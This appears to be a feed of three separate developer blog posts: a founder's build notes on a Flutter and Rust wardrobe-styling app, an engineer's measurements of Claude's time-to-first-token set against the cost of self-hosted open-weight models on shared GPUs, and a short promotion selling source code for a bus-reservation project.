The on-device brain handles color analysis, harmony scoring, and outfit compatibility. I tried doing this in Dart first. It was too slow. Color distance calculations in tight loops, converting between color spaces, running harmony checks across every item pair in a wardrobe. Dart isolates helped but added complexity without solving the core problem: CPU-bound math needs compiled code. I rewrote it in Rust, bridged to Flutter via flutter_rust_bridge. Scoring now runs in ~20-30ms on a mid-range Android phone. The Rust binary adds about 4MB to the APK, which felt worth it.
The scoring algorithm itself went through three complete rewrites. Telling navy from black programmatically is genuinely hard. CIE Delta E gets you close, but perceptual color difference is still messy at the dark end of the spectrum. Your eyes handle this effortlessly. Code does not.
The cloud brain handles understanding. When you scan a clothing item, an edge function sends the photo to a vision model that identifies type, color, pattern, material. When you ask for outfit suggestions, another function builds context from your wardrobe and passes it to an LLM. Different tasks, different models. Cloud response times vary (2-8 seconds depending on the model and task), which is fine because these aren't real-time interactions.
The two never overlap. Scoring is always local. Understanding is always cloud. This means the core app works offline, which matters a lot in India where connectivity is unpredictable.
AI features cost money to run. I'm bootstrapped. Subsidizing API calls for every user isn't sustainable.
So I built a bring-your-own-key system. Users can plug in their own OpenAI or Anthropic API key and get the full AI experience without paying me a subscription. Keys are encrypted on the phone and never touch our servers in plaintext. There's also paid tiers for people who don't want to think about API keys.
This was controversial in my head for a while. "Asking users to get their own API key" sounds like terrible UX. But it turns out there's a niche of technical users who actually prefer this. They like knowing exactly what model runs, what it costs, and that their data goes to the provider they chose. It's not for everyone, but it's a real segment.
The wardrobe is stored locally in SQLite. Not as a cache. As the source of truth.
I didn't want the app to break when you lose signal. You should be able to browse your wardrobe, check outfit history, and get scoring results in airplane mode. Cloud sync happens in the background when you're online.
The downside is sync conflicts. Two devices editing the same wardrobe creates problems I'm still working through. Last-write-wins is what I ship with for now, but it's not great when someone adds items on a tablet and a phone simultaneously. Solving this properly is on the list.
I shipped too many features at launch. Wardrobe management, AI outfits, weather integration, trip packing, laundry tracking, wear reminders, style profiles. That's three apps pretending to be one. Should've shipped wardrobe + AI outfits and added the rest over time.
My Play Store screenshots were raw app captures. Status bars visible. Timestamps. Battery icons. No marketing framing. People decide whether to install your app in about two seconds of scrolling, and I gave them nothing to work with. Still fixing this weeks later.
Debugging across the Rust bridge was also painful early on. When something panics in Rust, the error you get on the Flutter side is not always helpful. I spent a full day on a crash that turned out to be a type mismatch in the FFI layer that codegen silently accepted. Added a lot of defensive logging after that.
I also copy-pasted boilerplate across backend functions for months before building a shared utilities layer. Auth middleware, response helpers, error formatting, all duplicated. Embarrassing but honest.
The blog was a good early bet. I wrote about color theory in fashion, capsule wardrobe math, pattern mixing rules. Technical content at the intersection of fashion and algorithms. Five posts, bringing in organic search traffic before anyone even downloads the app.
The on-device scoring engine was painful to set up but it's a genuine differentiator. Most wardrobe apps send every request to a server. Having instant, offline scoring on a 29MB app feels noticeably better. Users don't know it's Rust running on their phone. They just know it's fast.
Social features are rolling out. Users can share outfit combinations. After that, iOS and a web app.
The developer account is under Clarixo, my parent brand. Outfii is the first product. Bootstrapped, planning to stay that way.
If you want to try it: outfii.in
Play Store: Outfii - AI Wardrobe Stylist
If you're building solo, optimize for decisions you can live with for a while. The architecture won't be perfect. Ship the version that's good enough, then fix the parts that actually hurt.
2026-03-31 06:21:51
Claude has a real speed problem for our team — but mostly in TTFT, not in raw decoding speed.
I measured our actual usage and found this:
That explains the feeling: Claude often isn’t that slow once it starts, but sometimes it takes so long to begin that the whole thing feels like it’s crawling.
That naturally raises the next question:
Should we move the team to self-hosted open-weight models?
At first glance, that sounds promising. Self-hosted setups can have dramatically better TTFT. In the numbers I looked at, open-weight deployments were often estimated around 150–600ms TTFT, versus Claude’s 4–7s median in our real usage.
But once I looked at the actual team setup — 10 engineers sharing one GPU budget — the answer stopped looking obvious.
The best open-weight models need serious multi-GPU infra, and once that infra is shared, the speed case starts looking surprisingly shaky.
So this post is not “open source bad.”
It’s a narrower question:
If Claude feels slow, is moving a team to open-weight models on shared infra actually the answer?
Right now, I’m not convinced.
This started with a very practical complaint:
Claude is slow.
That could mean a lot of things, so I measured it.
From about 50 session files and roughly 3,000 API calls, the problem was clear: the main issue was TTFT, especially in the tail.
| Trigger | p10 | p50 | p90 |
|---|---|---|---|
| User message | 2.8s | 6.8s | 28.1s |
| Tool result | 2.5s | 4.2s | 14.5s |
That 28.1s p90 is the whole story.
Claude is not just “a bit laggy” there. It’s slow enough to break flow.
Here’s the other half of the picture.
| Metric | p10 | p50 | p90 |
|---|---|---|---|
| Decode tok/s (excluding TTFT) | 72 | 178 | 567 |
| Wall tok/s (including TTFT) | 23 | 41 | 63 |
And per model:
| Model | TTFT p50 | Decode p50 |
|---|---|---|
| Haiku 4.5 | 1.8s | 287 tok/s |
| Sonnet 4.6 | 4.2s | 176 tok/s |
| Opus 4.6 | 4.7s | 130 tok/s |
So the core problem wasn’t really:
Claude can’t stream fast enough.
It was:
Claude often takes too long to get started.
That distinction matters, because it makes self-hosting sound much more attractive than it might actually be.
If TTFT is the problem, then self-hosting sounds like the clean fix.
The pitch is simple:
And the numbers I collected from the self-hosting side were definitely seductive.
| Metric | Claude now | Best self-hosted |
|---|---|---|
| Tool-triggered TTFT p50 | 4,200ms | ~160ms |
| User-triggered TTFT p50 | 6,800ms | ~160ms |
| Bad-day p90 | 14,500ms+ | <400ms |
If TTFT were the only thing that mattered, I think this would already be enough to move seriously toward GPUs.
But TTFT is not the whole developer experience.
We’re not talking about toy models here. We’re talking about the real open-weight candidates people would actually put on the table.
| Model | Why consider it? |
|---|---|
| Qwen3-Coder-Next | Fast MoE coding model, 80B total / 3B active |
| MiniMax M2.5 | Stronger quality candidate, 230B total / 10B active |
| DeepSeek V3.2 | Very large MoE option |
| Qwen3.5-27B | Dense, simpler, slower but cheaper |
And the inference engines are the standard ones you’d expect:
| Model family | Realistic inference engine |
|---|---|
| Qwen / DeepSeek | vLLM or SGLang |
| MiniMax M2.5 | vLLM |
| Dense smaller models | usually vLLM |
That means this isn’t some hypothetical future stack. It’s the standard modern self-hosted inference path.
This is the piece I think gets hand-waved away too often.
Our current setup is:
| Item | Value |
|---|---|
| Engineers | 10 |
| Claude subscription per engineer | $150/mo |
| Total Claude cost | $1,500/mo |
The budget I was willing to entertain for self-hosting was roughly 3× that, so about $4,500/month.
That sounds like a lot.
But for top open-weight coding models, it buys you something like this:
| Config | Cost/month | Notes |
|---|---|---|
| 5× H100 on Vast.ai | $4,712 | Enough for MiniMax M2.5 / DeepSeek-class INT4 |
| 3× H100 on Lambda | $4,521 | More reliable, lower GPU count |
| 4× H200 on Vast.ai | $4,153 | Better memory bandwidth |
| 8× A100 on Vast.ai | $2,580 | Cheapest high-count option |
That’s not “10 engineers each get a fast private model.”
That’s one shared cluster.
And that changes the question completely.
The right equation is not:
lower TTFT = faster experience
It’s more like:
team step time = queueing + TTFT + output_tokens / decode_speed
That’s the part that made me hesitate.
Because once you share one cluster across 10 engineers:
That is a very different situation from “look how fast this benchmark is on one box.”
The self-hosted numbers I gathered looked like this:
| Model | Config | INT4 decode tok/s |
|---|---|---|
| Qwen3-Coder-Next | 2× H100 | ~3,400 |
| MiniMax M2.5 | 4× H100 | ~2,000 |
| MiniMax M2.5 | 2× H100 | ~1,000 |
| DeepSeek V3.2 | 5× H100 | ~700 |
| Qwen3.5-27B | 2× H100 | ~380 |
| Qwen3.5-27B | 1× H100 | ~190 |
Those numbers are exciting. They make open weights look like a no-brainer.
But they also raise exactly the question I still don’t think I’ve answered cleanly:
Are these the numbers one engineer feels, or the numbers a shared cluster produces in aggregate?
Because for a 10-person team, those are not the same thing.
And once I started looking at the problem through the lens of shared infra, the speed case stopped looking like an obvious slam dunk.
I think I’ve convinced myself of a few things:
| Statement | My current view |
|---|---|
| Claude has a real speed problem | Yes |
| The problem is mostly TTFT | Yes |
| Self-hosting probably improves TTFT a lot | Yes |
| The best open-weight models are expensive to run well | Yes |
| Shared infra weakens the speed story | Yes |
| Moving the whole team looks obviously promising | No |
That’s the interesting part.
The story I expected was:
Claude is slow, open weights are fast, buy GPUs, problem solved.
The story I actually found was:
Claude is slow mostly because of TTFT.
Open weights probably help that.
But once the infra is shared across a team, the speed case gets much less clean.
I started with a very simple frustration:
Claude felt slow.
I measured it and found a very specific issue:
TTFT, especially the p90 tail, was bad enough to make the whole experience feel like it was crawling.
That led to the obvious next idea:
What if we just move to open-weight models on our own GPUs?
And right now, my answer is not “definitely no.”
It’s this:
Open-weight models look promising for TTFT.
They look much less promising as a shared-infra speed fix for a whole team.
That’s the question I’m left with.
Not whether open weights are good.
Not whether they’re possible.
But whether they really solve the problem we actually have.
2026-03-31 06:20:01
Hey DEV community! 👋
For the past few weeks, I wanted to build something that solves a complex real-world problem. So, I built a complete "SaaS-in-a-box" Bus Reservation platform called Ani Travels.
My main challenge was handling concurrency—making sure two people looking at the same open seat cannot book it simultaneously.
You can play around with the Live Demo here:
🔗 https://ani-travels-bus-booking.vercel.app
(Since the backend is on Render free tier, please excuse the initial 50-second cold start!)
I am selling the Complete Source Code along with detailed setup instructions if any entrepreneur or dev wants to skip 100+ hours of coding and launch their own startup/project immediately. It comes with seed scripts to populate DB instantly.
👉 Get the Full Source Code from my Gumroad
Would love to hear constructive feedback! How do you handle complex booking architectures in your apps?